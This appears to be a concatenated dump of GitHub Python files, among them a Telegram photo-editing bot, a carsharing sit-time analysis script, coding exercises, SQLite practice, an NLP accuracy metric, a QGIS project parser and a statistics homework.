= types.KeyboardButton(text='/blur_photo')\n btn5 = types.KeyboardButton(text='/negative_photo')\n k_b.add(btn3)\n k_b.add(btn4)\n k_b.add(btn5)\n bot.send_message(message.chat.id, text='Выберите обработку', reply_markup=k_b)\n\n\n@bot.message_handler(commands=['reverse_photo'])\ndef reverse(message):\n msg = bot.send_message(message.chat.id, \"Send photo\")\n bot.register_next_step_handler(msg, r_photo)\n\n\ndef r_photo(message):\n global ind\n ind += 1\n file_id = message.photo[-1].file_id\n file_info = bot.get_file(file_id)\n file_path = file_info.file_path\n downloaded_file = bot.download_file(file_path)\n\n with open('saved_photo' + str(ind) + '.jpg', 'wb') as new_file:\n new_file.write(downloaded_file)\n\n im = Image.open('saved_photo' + str(ind) + '.jpg')\n im = im.transpose(Image.FLIP_LEFT_RIGHT)\n\n bot.send_photo(message.chat.id, im)\n\n time.sleep(10)\n delete_jpg_files(project_folder)\n\n\n\n\n@bot.message_handler(commands=['blur_photo'])\ndef blur(message):\n msg = bot.send_message(message.chat.id, \"Send photo\")\n bot.register_next_step_handler(msg, b_photo)\n\n\ndef b_photo(message):\n global ind\n ind += 1\n file_id = message.photo[-1].file_id\n file_info = bot.get_file(file_id)\n file_path = file_info.file_path\n downloaded_file = bot.download_file(file_path)\n\n with open('saved_photo' + str(ind) + '.jpg', 'wb') as new_file:\n new_file.write(downloaded_file)\n\n im = Image.open('saved_photo' + str(ind) + '.jpg')\n\n for i in range(100):\n im = im.filter(ImageFilter.BLUR)\n\n bot.send_photo(message.chat.id, im)\n\n time.sleep(10)\n delete_jpg_files(project_folder)\n\n\n\n\n\n\n\n@bot.message_handler(commands=['negative_photo'])\ndef negative(message):\n msg = bot.send_message(message.chat.id, \"Send photo\")\n bot.register_next_step_handler(msg, n_photo)\n\n\ndef n_photo(message):\n global ind\n ind += 1\n file_id = message.photo[-1].file_id\n file_info = bot.get_file(file_id)\n file_path = file_info.file_path\n downloaded_file = bot.download_file(file_path)\n\n with open('saved_photo' + str(ind) + '.jpg', 'wb') as new_file:\n new_file.write(downloaded_file)\n\n im = Image.open('saved_photo' + str(ind) + '.jpg')\n\n im = ImageOps.invert(im)\n\n bot.send_photo(message.chat.id, im)\n\n time.sleep(10)\n delete_jpg_files(project_folder)\n\n\nbot.polling(none_stop=True, 
interval=0)\n","repo_name":"ZdobnyakovGT/Zdobnyakov_Labs_IU5-34B","sub_path":"HW.py","file_name":"HW.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
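One caveat with the bot above: `bot.send_photo` in pyTelegramBotAPI expects bytes or a file-like object, and passing a `PIL.Image` directly may not be accepted by every version of the library. A minimal sketch of serializing the processed image first (`send_pil_image` and `buf` are names introduced here for illustration):

```python
import io

def send_pil_image(bot, chat_id, im):
    # Serialize the PIL image to an in-memory JPEG before uploading,
    # so send_photo receives a file-like object it understands.
    buf = io.BytesIO()
    im.save(buf, format='JPEG')
    buf.seek(0)
    bot.send_photo(chat_id, buf)
```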
+{"seq_id":"35720588608","text":"#!/usr/bin/env python3\nimport MySQLdb as mysql\nimport json\nimport os\nimport sys\nfrom statistics import pstdev, stdev \n\ndb_config = json.loads(sys.argv[1])\nstart_date = sys.argv[2]\n\nmysql_connection = mysql.connect(database=db_config['database'], user=db_config['username'], password=db_config['password'])\ncursor = mysql_connection.cursor()\n\ndef get_sit_times():\n cursor.execute(\"\"\"select bookings.id, bookings.car_id, booking_details.type, booking_details.longitude,\n booking_details.latitude, booking_details.created_at, bookings.user_id from bookings\n join booking_details on bookings.id = booking_details.booking_id \n where date(bookings.created_at) > date(\"{}\") \n and hour(bookings.created_at) between 7 + 7 and 20 + 7 \n order by car_id desc, bookings.created_at asc\n ;\"\"\".format(start_date))\n\n line = cursor.fetchone()\n\n i = 1\n end_time = 0\n sit_time = []\n mult = 200.0\n \n while line:\n if i == 1:\n i+=1\n line = cursor.fetchone()\n else:\n carId = line[1]\n while line and line[1] == carId:\n if line[2] == 'end':\n end_time = line[5]\n long_end = round(line[3] * mult) / mult\n lat_end = round(line[4] * mult) / mult\n else:\n start_time = line[5]\n try:\n time_between = start_time - end_time\n time_between = 0\n \n long_start= round(line[3] * mult) / mult\n lat_start = round(line[4] * mult) / mult\n if long_start == long_end and lat_start == lat_end:\n sit_time += [(round(line[4]*2 * mult)/(2 * mult), round(line[3]*2 * mult)/(2 * mult), time_between.seconds, line[0], line[6])]\n except:\n pass\n i += 1\n line = cursor.fetchone()\n\n line = cursor.fetchone()\n averages = {}\n for i in sit_time:\n points = (round(i[0]*2 * mult)/(2 * mult) , round(i[1]*2 * mult)/(2 * mult))\n seconds = i[2]\n if points in averages:\n averages[points] += [seconds]\n else:\n averages[points] = [seconds]\n \n for i in averages.keys():\n av = sum(averages[i])/len(averages[i])\n averages[i] = [av, len(averages[i])]\n \n \n real_sit_time= []\n for i in averages.keys():\n long = i[0]\n lat = i[1]\n time = averages[i][0]\n freq = averages[i][1]\n real_sit_time += [(long, lat, time, freq)]\n \n \n \"\"\"\n with open(\"/var/log/outgoing/sit-time-points.js\", \"w\") as outfile: \n outfile.write(\"{}{}\".format(\"var points=\", json.dumps(real_sit_time)))\n # The indicies in the subarray are [lat, lng, sit_time, booking_id, user_id]\n \"\"\"\n return sit_time\n #return list(map(lambda x: x[2], sit_time))\n\ndef get_standard_deviation(sit_times):\n only_times = list(map(lambda x: x[2], sit_times))\n return stdev(only_times)\n\ndef get_outlier_bookings(standard_deviation, sit_times, percent_outside_accepted):\n outliers = list(filter(lambda x: abs(standard_deviation - x[2]) > standard_deviation + ((percent_outside_accepted / 100) * standard_deviation) , sit_times))\n return outliers\n\ndef outliers_by_user(booking_list):\n outliers_counts = {}\n for user in booking_list:\n if user[4] in outliers_counts:\n outliers_counts[user[4]] += 1\n else:\n outliers_counts[user[4]] = 1\n users_list = list(filter(lambda x: outliers_counts[x], outliers_counts))\n users_list = list(map(lambda x: str(x), users_list))\n query = \"select id, first_name, last_name from users where id in ({});\".format(\", \".join(users_list))\n cursor.execute(query)\n user_names = {a : (b, c) for a, b, c in cursor}\n query = \"select user_id, count(id) from bookings where user_id in ({}) group by user_id;\".format(\", \".join(users_list))\n cursor.execute(query)\n bookings_counts = {a : b for a, b 
in cursor}\n user_ratios = {}\n for key in outliers_counts:\n user_ratios[key] = {\n \"ratio\": outliers_counts[key] / bookings_counts[key],\n \"bookings\": bookings_counts[key],\n \"outliers\": outliers_counts[key]\n }\n output = {}\n for user in user_names:\n output[user_names[user]] = user_ratios[user]\n\n return user_ratios\n\nif __name__ == \"__main__\":\n sit_times = get_sit_times()\n standard_deviation = get_standard_deviation(sit_times)\n outliers = get_outlier_bookings(standard_deviation, sit_times, 0)\n users_with_outliers = outliers_by_user(outliers) \n print(json.dumps(users_with_outliers))\n mysql_connection.close()\n\n","repo_name":"WaiveCar/Waivecar","sub_path":"analysis/sitTimes.py","file_name":"sitTimes.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7328566749","text":"xcount = 0\nycount = 0\n\nread = []\n\nwith open('December2.txt') as file:\n\tfor line in file:\n\t\tline = line.split(\" \")\n\t\tread.append(line)\n\t\tif line[0] == \"forward\":\n\t\t\txcount += int(line[1])\n\t\tif line[0] == \"down\":\n\t\t\tycount -= int(line[1])\n\t\tif line[0] == \"up\":\n\t\t\tycount += int(line[1])\n\nprint(xcount * abs(ycount))\n\nposition = 0\ndepth = 0\naim = 0\n\nfor i in range(len(read)):\n\tif read[i][0] == \"forward\":\n\t\tdepth += (aim * int(read[i][1]))\n\t\tposition += int(read[i][1])\n\tif read[i][0] == \"down\":\n\t\taim += int(read[i][1])\n\tif read[i][0] == \"up\":\n\t\taim -= int(read[i][1])\n\t\t\nprint(position * depth)\n","repo_name":"eduardoloz/CCC","sub_path":"AdventOfCode/2-Dive/December2.py","file_name":"December2.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"41558741430","text":"class LinearSearch:\n\n\n def search(self,list,n):\n\n for i in range(len(list)):\n if list[i]==n:\n return True\n return False\n\n\n\nlist = [1,2,3,4,5]\nobj=LinearSearch();\nresult =obj.search(list,7);\nif result:\n print(\"found\")\nelse:\n print(\"not found\")","repo_name":"Mohit0888/Variables","sub_path":"variable/linearSearch.py","file_name":"linearSearch.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70507793372","text":"# Напишите программу, которой на вход подается последовательность чисел через пробел, а также\r\n# запрашивается у пользователя любое число.\r\n# В качестве задания повышенного уровня сложности можете выполнить проверку соответствия указанному\r\n# в условии ввода данных.\r\n# Далее программа работает по следующему алгоритму:\r\n# --Преобразование введённой последовательности в список\r\n# --Сортировка списка по возрастанию элементов в нем(для реализации сортировки определите функцию)\r\n# --Устанавливается номер позиции элемента, который меньше введенного пользователем числа, а следующий\r\n# за ним больше или равен этому числу.\r\n#\r\n# При установке позиции элемента воспользуйтесь алгоритмом двоичного поиска, который был рассмотрен в\r\n# этом модуле. Реализуйте его также отдельной функцией.\r\n#\r\n# Подсказка\r\n# Помните, что у вас есть числа, которые могут не соответствовать заданному условию. В этом случае необходимо\r\n# вывести соответствующее сообщение.\r\n\r\n# можно выбрать: вводим числа с клавиатуры или загружаем из файла\r\n\r\nimport sys\r\n\r\ndef sort(L):\r\n for i in range(len(L)):\r\n idx_min = i\r\n for j in range(i, len(L)):\r\n if L[j] < L[idx_min]:\r\n idx_min = j\r\n if i != idx_min:\r\n L[i], L[idx_min] = L[idx_min], L[i]\r\n return L\r\n\r\ndef search(L, num, left, right):\r\n if left > right:\r\n return False\r\n middle = (right + left) // 2\r\n if L[middle] == num:\r\n return middle\r\n elif num < L[middle]:\r\n return search(L, num, left, middle - 1)\r\n else:\r\n return search(L, num, middle + 1, right)\r\n\r\n\r\n# алфавит допустимых символов\r\nsymbols = ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '.', '-', ' ', '\\n')\r\n\r\ninput_str = '' # здесь храним введенную строку\r\nerror_symbol = '' # переменная для хранения неверных символов\r\nmy_str = ''\r\n\r\nanswer = input(\"Данные возьмем из файла (1) или введем с клавиатуры (2)?\\n\")\r\nif answer == '1':\r\n file_name = input('Введите имя файла с последовательностью чисел ')\r\n try:\r\n with open(file_name) as file:\r\n my_str = file.readline()\r\n except FileNotFoundError:\r\n print('Файл не найден')\r\n exit()\r\nelif answer == '2':\r\n print('Введите последовательность чисел через пробел.')\r\n my_str = sys.stdin.readline()\r\nelse:\r\n print('При следующем запуске программы введите \"1\" или \"2\"\\nЗавершаем работу...')\r\n exit()\r\n\r\nfor char in my_str:\r\n if char in symbols:\r\n input_str += char\r\n else:\r\n error_symbol += char\r\nif error_symbol:\r\n print('Вы ввели недопустимые символы: \"' + error_symbol + '\"')\r\n\r\n# если пользователь поставил минус после числа\r\ntry:\r\n list_of_numbers = list(map(float, input_str.split()))\r\nexcept ValueError:\r\n print('Символ \"-\" должен находиться перед числом\\nЗавершаем работу...')\r\n exit()\r\n\r\n# вводим число и добавляем его к списку\r\nnumber = float(input('Введите число: \\n'))\r\nprint('Список до сортировки: ' + str(list_of_numbers))\r\nlist_of_numbers.append(number)\r\n\r\n# сортируем\r\nlist_of_numbers = sort(list_of_numbers)\r\n\r\n# ищем позицию числа, введенного пользователем\r\npoz = search(list_of_numbers, number, 0, len(list_of_numbers))\r\nif poz == 0:\r\n print('Введенное число является минимальным среди чисел последовательности') # поэтому\r\n # не удовлетворяет нашим условиям\r\nelif list_of_numbers[-1] == number and list_of_numbers[-1] != list_of_numbers[-2]:\r\n print('Введенное число является максимальным среди чисел последовательности') # и после него нет числа,\r\n # равного 
введенному, поэтому не удовлетворяет нашим условиям\r\nelse:\r\n while list_of_numbers[poz] == list_of_numbers[poz - 1]:\r\n poz -= 1\r\n print(f'Индекс элемента списка, который меньше числа {number}: ' + str(poz - 1))\r\nlist_of_numbers.pop(poz)\r\nprint('Список после сортировки: ' + str(list_of_numbers))\r\n","repo_name":"ivmiller/HomeWork","sub_path":"1791-2.py","file_name":"1791-2.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
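The exercise above asks for a hand-written binary search, but the same position lookup exists in the standard library; a minimal sketch for comparison, with made-up sample values, assuming the list is already sorted:

```python
from bisect import bisect_left

numbers = [1.0, 2.0, 4.0, 4.0, 7.0]
number = 4.0
poz = bisect_left(numbers, number)  # first index whose element is >= number
if poz == 0:
    print('The entered number is the minimum of the sequence')
else:
    print(f'Index of the list element that is smaller than {number}: {poz - 1}')
```

`bisect_left` lands on the first occurrence of a duplicate, which is exactly what the exercise's while-loop that rewinds over equal neighbours reimplements by hand.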
+{"seq_id":"43250331877","text":"import argparse\nimport subprocess\n\n# usage: python main.py \"filepathtogradebook\" \"filepathtomajors\" \"filepathtoresults\" \"gradebook_studentid\" \"gradebook_assignment\" \"major_studentid\" \"major_name\" lowerthresholdinclusive higherthresholdexclusive\ndef get_arguments():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('gradebook')\n\tparser.add_argument('majorlist')\n\tparser.add_argument('range_results')\n\tparser.add_argument('grade_id')\n\tparser.add_argument('grade_column')\n\tparser.add_argument('major_id')\n\tparser.add_argument('major_column')\n\tparser.add_argument('lower_threshold', type=float)\n\tparser.add_argument('higher_threshold', type=float)\n\treturn parser.parse_args()\n\t\n# runs both range.py and pie.py so as to simplify process for user\ndef main():\n\targs = get_arguments()\n\tsubprocess.run([\"python\", \"range.py\", args.gradebook, args.majorlist, args.range_results, args.grade_id, args.grade_column, args.major_id, args.major_column, str(args.lower_threshold), str(args.higher_threshold)])\n\tsubprocess.run([\"python\", \"pie.py\", args.range_results, args.grade_column, str(args.lower_threshold), str(args.higher_threshold)])\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"Amndeep7/DrexelCSDepartmentAnalysisTool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38819414985","text":"import sqlite3\r\ndb = sqlite3.connect('python_programming_db')\r\ncursor = db.cursor() # Get a cursor object\r\n\r\ncursor.execute('''\r\n DROP TABLE IF EXISTS Student;\r\n''')\r\n\r\ncursor.execute(''' \r\n CREATE TABLE IF NOT EXISTS Student\r\n (\r\n id INTEGER PRIMARY KEY, \r\n name TEXT,\r\n grade INTEGER\r\n );\r\n''')\r\ndb.commit()\r\n\r\n# Inserting students\r\ncursor.execute('''\r\n INSERT INTO Student\r\n (\r\n id,\r\n name, \r\n grade\r\n )\r\n VALUES\r\n (\r\n 55,\r\n 'Carl Davis',\r\n 61\r\n ),\r\n (\r\n 66,\r\n 'Dennis Fredrickson',\r\n 88\r\n ),\r\n (\r\n 77,\r\n 'Jane Richards',\r\n 78\r\n ),\r\n (\r\n 12,\r\n 'Peyton Sawyer',\r\n 45\r\n ),\r\n (\r\n 2,\r\n 'Lucas Brooke',\r\n 99\r\n )\r\n ''')\r\ndb.commit()\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Select all records with grade between 60 and 80\r\ncursor.execute('''\r\n SELECT * FROM Student\r\n WHERE\r\n grade BETWEEN 60 AND 80;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Update Carl Davis' grade to 65\r\ncursor.execute('''\r\n UPDATE Student\r\n SET grade = 65\r\n WHERE\r\n name = 'Carl Davis';\r\n ''')\r\ndb.commit()\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Delete Dennis Fredrickson's row\r\ncursor.execute('''\r\n DELETE FROM Student\r\n WHERE\r\n name = 'Dennis Fredrickson'\r\n''')\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Change the grade of all people with an id less than 55\r\ncursor.execute('''\r\n UPDATE Student\r\n SET grade = 1\r\n WHERE\r\n id < 55;\r\n ''')\r\ndb.commit()\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\ndb.close()\r\nprint('Connection to database closed')\r\n","repo_name":"ehmtang/SE-Bootcamp-HyperionDev","sub_path":"T47 - SQLite/database_manip.py","file_name":"database_manip.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"69980423772","text":"import copy\nimport warnings\nimport numpy as np\nimport torch\n\nfrom graph4nlp.pytorch.modules.evaluation.base import EvaluationMetricBase\n\n\nclass Accuracy(EvaluationMetricBase):\n \"\"\"\n Calculate precision, recall, F1 for each labels\n\n Parameters\n ----------\n metrics: list\n Indicate the metric for the class to return.\n Note that each metric must be one of ``precision``, ``recall``, ``F1``, ``accuracy``.\n And the results' order is the same as the metrics.\n \"\"\"\n\n def __init__(self, metrics):\n super().__init__()\n if isinstance(metrics, list):\n for metric in metrics:\n if metric not in [\"precision\", \"recall\", \"F1\", \"accuracy\"]:\n raise TypeError(\n \"argument metric must be list of str containing \"\n \"'precision', 'recall', 'F1', 'accuracy'\"\n )\n self.metrics = metrics\n\n def calculate_scores(\n self, ground_truth, predict, average=None, zero_division=\"warning\", sample_weight=None\n ):\n \"\"\"\n The function to calculate the expected metrics for each labels\n\n Parameters\n ----------\n ground_truth: torch.Tensor\n Ground truth (correct) target values, 1d tensor\n predict: torch.Tensor\n The predicted target values generated by classifier, 1d tensor\n average: string or None, [None (default), 'micro', 'macro', 'weighted']\n If set ``None``, it will return the scores for each class.\n Otherwise, it will be reduced by the strategy as follows:\n\n ``'micro'``:\n Calculate metrics globally by counting the total true positives,\n false negatives and false positives.\n\n ``'macro'``:\n Calculate metrics for each label, and calculate the unweighted\n average values. This does not take label imbalance into account.\n\n ``'weighted'``:\n Calculate metrics for each label, and calculate the weighted\n average value. Note that the weight is the number of the true\n instances for each label.\n\n zero_division: \"warning\", 0, 1, default=\"warning\"\n Sets the value to return when there is a zero division.\n\n If set to \"warning\", this acts as 0, but warnings are also raised.\n\n sample_weight: None\n The sample weight. 
It is not implemented yet.\n\n Returns\n -------\n scores: list[object]\n Return the expected metrics initialized in the init function, in the \\\n order given by ``metrics``\n \"\"\"\n ground_truth_np, predict_np = self._check_available(ground_truth, predict, zero_division)\n\n # calculate accuracy\n scores = ground_truth_np == predict_np\n accuracy_score = np.average(scores)\n\n if self.metrics == [\"accuracy\"]:\n return [accuracy_score]\n\n mcm = self._calculate_confusion_matrix(ground_truth=ground_truth_np, predict=predict_np)\n\n tp_sum = mcm[:, 1, 1]\n pred_sum = tp_sum + mcm[:, 0, 1]\n gt_sum = tp_sum + mcm[:, 1, 0]\n\n if average == \"micro\":\n tp_sum = np.array([tp_sum.sum()])\n pred_sum = np.array([pred_sum.sum()])\n gt_sum = np.array([gt_sum.sum()])\n\n # calculate precision and recall\n precision = self._prf_divide(tp_sum, pred_sum, zero_division=zero_division)\n recall = self._prf_divide(tp_sum, gt_sum, zero_division=zero_division)\n\n # calculate F_beta\n beta2 = 1 ** 2 # note: only F1 here\n denominator = beta2 * precision + recall\n\n denominator[denominator == 0.0] = 1 # avoid division by 0\n f_score = (1 + beta2) * precision * recall / denominator\n\n if average == \"weighted\":\n weighted = gt_sum\n else:\n weighted = None\n\n if average is not None:\n precision = np.average(precision, weights=weighted)\n recall = np.average(recall, weights=weighted)\n f_score = np.average(f_score, weights=weighted)\n scores = []\n\n for metric_name in self.metrics:\n if metric_name == \"precision\":\n scores.append(precision)\n elif metric_name == \"recall\":\n scores.append(recall)\n elif metric_name == \"F1\":\n scores.append(f_score)\n elif metric_name == \"accuracy\":\n scores.append(accuracy_score)\n else:\n raise NotImplementedError()\n return scores\n\n @staticmethod\n def _prf_divide(numerator, denominator, zero_division):\n \"\"\"\n The function performs division and handles zero-division situations.\n\n Parameters\n ----------\n numerator: numpy.ndarray\n denominator: numpy.ndarray\n zero_division: \"warning\", 0, 1, default=\"warning\"\n Sets the value to return when there is a zero division.\n\n If set to \"warning\", this acts as 0, but warnings are also raised.\n Returns\n -------\n results: numpy.ndarray\n The division results.\n\n \"\"\"\n zero_mask = denominator == 0.0\n denominator_cp = copy.deepcopy(denominator)\n denominator_cp[zero_mask] = 1.0\n ret = numerator / denominator_cp\n if np.sum(zero_mask) == 0:\n return ret\n ret[zero_mask] = 0.0 if zero_division in [\"warning\", 0] else 1.0\n if zero_division == \"warning\":\n warnings.warn(\"zero division encountered\")\n return ret\n\n @staticmethod\n def _check_available(ground_truth, predict, zero_division):\n \"\"\"\n The function to check the parameters.\n If all tests are passed, it will convert the tensor to numpy.\n\n Parameters\n ----------\n ground_truth: Any\n predict: Any\n zero_division: Any\n\n Returns\n -------\n ground_truth: numpy.ndarray\n numpy version of tensor ground_truth\n predict: numpy.ndarray\n numpy version of tensor predict\n\n Raises\n -------\n TypeError: TypeError\n ValueError: ValueError\n \"\"\"\n if not isinstance(ground_truth, torch.Tensor):\n raise TypeError(\"argument ground_truth must be torch.tensor\")\n if not isinstance(predict, torch.Tensor):\n raise TypeError(\"argument predict must be torch.tensor\")\n if ground_truth.dtype not in [torch.int, torch.int8, torch.int16, torch.int32, torch.int64]:\n raise TypeError(\"argument ground_truth must be int tensor\")\n if 
predict.dtype not in [torch.int, torch.int8, torch.int16, torch.int32, torch.int64]:\n raise TypeError(\"argument predict must be int tensor\")\n if len(ground_truth.shape) != 1:\n raise TypeError(\"argument ground_truth must be 1d tensor\")\n if len(predict.shape) != 1:\n raise TypeError(\"argument predict must be 1d tensor\")\n if ground_truth.shape[0] != predict.shape[0]:\n raise ValueError(\"argument ground_truth and predict must be the same shape\")\n\n zero_division_ok = False\n if isinstance(zero_division, str) and zero_division == \"warning\":\n zero_division_ok = True\n elif isinstance(zero_division, (int, float)) and zero_division in [0, 1]:\n zero_division_ok = True\n\n if not zero_division_ok:\n raise ValueError(\"argument zero_division must be in ['warning', 0, 1]\")\n\n return ground_truth.numpy(), predict.numpy()\n\n def _calculate_confusion_matrix(self, ground_truth, predict):\n \"\"\"\n The function to calculate the confusion matrix for multi-class inputs.\n The labels will be collected and relabeled. (eg: [1, 2, 3] --> [0, 1, 2])\n\n In multi-class confusion matrix :math:`MCM`, the count of true negatives is\n :math:`MCM_{:,0,0}`, false positives is :math:`MCM_{:,0,1}`, false negatives\n is :math:`MCM_{:,1,0}` and true positive is :math:`MCM_{:,1,1}`.\n\n Parameters\n ----------\n ground_truth: numpy.ndarray\n predict: numpy.ndarray\n\n Returns\n -------\n confusion_matrix: numpy.ndarray\n The confusion matrix which has the shape: [num_labels, 2, 2]\n \"\"\"\n # select all labels, remove duplicates and sort\n unique_labels = sorted(self._get_unique_labels(ground_truth, predict))\n\n # do relabeling\n ground_truth_transformed = np.searchsorted(unique_labels, ground_truth)\n predict_transformed = np.searchsorted(unique_labels, predict)\n\n # the number of labels after relabeling\n n_labels = len(unique_labels)\n\n tp = ground_truth_transformed == predict_transformed\n tp_bins = ground_truth_transformed[tp]\n tp_sum = np.bincount(tp_bins, weights=None, minlength=n_labels)\n pred_sum = np.bincount(predict_transformed, minlength=n_labels)\n gt_sum = np.bincount(ground_truth_transformed, minlength=n_labels)\n fp = pred_sum - tp_sum\n fn = gt_sum - tp_sum\n tp = tp_sum\n tn = ground_truth_transformed.shape[0] - tp - fp - fn\n return np.array([tn, fp, fn, tp]).T.reshape(-1, 2, 2)\n\n @staticmethod\n def _get_unique_labels(*lists):\n \"\"\"\n find the unique elements in the given lists\n\n Parameters\n ----------\n lists: [numpy.ndarray]\n List of lists which contain labels.\n Returns\n -------\n unique_labels: numpy.ndarray\n It has unique labels encountered in the ``lists``.\n \"\"\"\n ret = []\n for li in lists:\n unique_li = np.unique(li)\n ret.extend(unique_li.tolist())\n ret = list(set(ret))\n return np.array(ret)\n","repo_name":"graph4ai/graph4nlp","sub_path":"graph4nlp/pytorch/modules/evaluation/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":9915,"program_lang":"python","lang":"en","doc_type":"code","stars":1637,"dataset":"github-code","pt":"32"}
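A short usage sketch for the metric class above; the tensor values are made up for illustration:

```python
import torch

metric = Accuracy(metrics=['precision', 'recall', 'F1', 'accuracy'])
ground_truth = torch.tensor([0, 1, 2, 2, 1, 0], dtype=torch.int64)
predict = torch.tensor([0, 2, 2, 2, 1, 1], dtype=torch.int64)

# average=None returns per-class arrays; 'micro'/'macro'/'weighted' reduce to scalars
precision, recall, f1, acc = metric.calculate_scores(ground_truth, predict, average='macro')
```

The returned list follows the order of the `metrics` argument passed to the constructor, so the unpacking above matches `['precision', 'recall', 'F1', 'accuracy']`.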
+{"seq_id":"28824983423","text":"import os\n\nfrom collections import OrderedDict\nfrom PyQt4.QtXml import QDomDocument\nfrom PyQt4.QtCore import QDir, QFileInfo\n\nfrom qgis.gui import QgsMapCanvasLayer\nfrom qgis.core import QgsVectorLayer, QgsRasterLayer, QgsMapLayerRegistry, QgsMapSettings, QgsProject\n\n\ndef layer_by_id(layerid):\n return QgsMapLayerRegistry.instance().mapLayers()[layerid]\n\n\ndef iternodes(nodes):\n for index in xrange(nodes.length()):\n yield nodes.at(index).toElement()\n\n\nclass Project(object):\n def __init__(self, xmldoc):\n self.doc = xmldoc\n self._maplayers = None\n\n @classmethod\n def fromFile(cls, filename):\n QDir.setCurrent(os.path.dirname(filename))\n fileinfo = QFileInfo(filename)\n QgsProject.instance().read(fileinfo)\n xml = open(filename).read()\n doc = QDomDocument()\n doc.setContent(xml)\n return cls(doc)\n\n def _createLayer(self, node):\n type = node.attribute('type')\n if type == \"vector\":\n layer = QgsVectorLayer()\n elif type == \"raster\":\n layer = QgsRasterLayer()\n else:\n return None\n layer.readLayerXML(node)\n return layer\n\n def _getLayer(self, node):\n filelist = node.elementsByTagName(\"legendlayerfile\")\n layerfile = filelist.at(0).toElement()\n layerid = layerfile.attribute('layerid')\n visible = int(layerfile.attribute('visible'))\n return layerid, bool(visible)\n\n def maplayers(self):\n return QgsMapLayerRegistry.instance().mapLayers().values()\n\n def legendlayers(self):\n legendnodes = self.doc.elementsByTagName(\"legendlayer\")\n layers = OrderedDict()\n for elm in iternodes(legendnodes):\n layerid, visible = self._getLayer(elm)\n layers[layerid] = visible\n return layers\n\n def settings(self):\n \"\"\"\n Return the settings that have been set for the map canvas.\n @return: A QgsMapSettings instance with the settings read from the project.\n \"\"\"\n canvasnodes = self.doc.elementsByTagName(\"mapcanvas\")\n node = canvasnodes.at(0).toElement()\n settings = QgsMapSettings()\n settings.readXML(node)\n return settings\n\n def visiblelayers(self):\n # Filter out only the ones we can see.\n visible = [layerid for layerid, visible in self.legendlayers().iteritems() if visible]\n return [layer_by_id(layerid) for layerid in visible]\n","repo_name":"NathanW2/qgis2img","sub_path":"qgis2img/projectparser.py","file_name":"projectparser.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"}
+{"seq_id":"37236627056","text":"# Statistische Muserekennung WS 2023\n# Benjamin Stifter, 01618881\n# Olivia Panzenböck, 11775488\n\nimport numpy as np\nfrom scipy import stats\nimport matplotlib.pyplot as plt\nimport scipy.integrate as integrate\n\n\n# Aufgabe3\n\ndef dichte(x, mu, std):\n p_x=[]\n for i in x:\n p_x1 = 1/(np.sqrt(2*np.pi)*std) * np.exp(-np.power(i-mu,2)/(2*np.power(std,2))) # S. 237\n p_x.append(p_x1)\n return p_x\n\ndef rand(x, p_x_mu, p_mu, p_x_mu2, p_mu2 ):\n p_x=[]\n for i in range(len(x)):\n p_x1=p_x_mu[i] * p_mu +p_x_mu2[i] * p_mu2\n p_x.append(p_x1)\n return p_x\n\n return\n\ndef posterior(x, p_x_mu, p_mu, p_x):\n p_mu_x=[]\n for i in range(len(x)):\n p_mu_x1=(p_mu[i] * p_x_mu) / p_x[i]\n p_mu_x.append(p_mu_x1)\n return p_mu_x\n\n# Werte\np_H0 = [0.9, 0.99]\np_H1 = [0.1, 0.01]\nmu_H0 = 4\nstd_H0 = np.sqrt(1)\nmu_H1 = 5\nstd_H1 = np.sqrt(1)\n\n# Aufgabe a)\nx_values=np.linspace(0, 12, 1000)\n\nFalse_P = 1-stats.norm.cdf(x_values, loc=mu_H0, scale=std_H0) # false positive\nTrue_P = 1-stats.norm.cdf(x_values, loc=mu_H1, scale=std_H1) # true positive\n\nVW1=[]\nVW2=[]\nfor i, j in enumerate(x_values):\n a = (True_P[i] * p_H1[0]) / (True_P[i] * p_H1[0] + False_P[i] * p_H0[0])\n b = (True_P[i] * p_H1[1]) / (True_P[i] * p_H1[1] + False_P[i] * p_H0[1])\n VW1.append(a)\n VW2.append(b)\n\n\nplt.figure(figsize=(18, 12))\nplt.plot(x_values, VW1, color='orange', label=r'$H_0$ = 0.9, $H_1$ = 0.1')\nplt.plot(x_values, VW2, color='brown', label=r'$H_0$ = 0.99, $H_1$ = 0.01')\n#plt.title(r'positiven Vorhersagewert als Funktion der 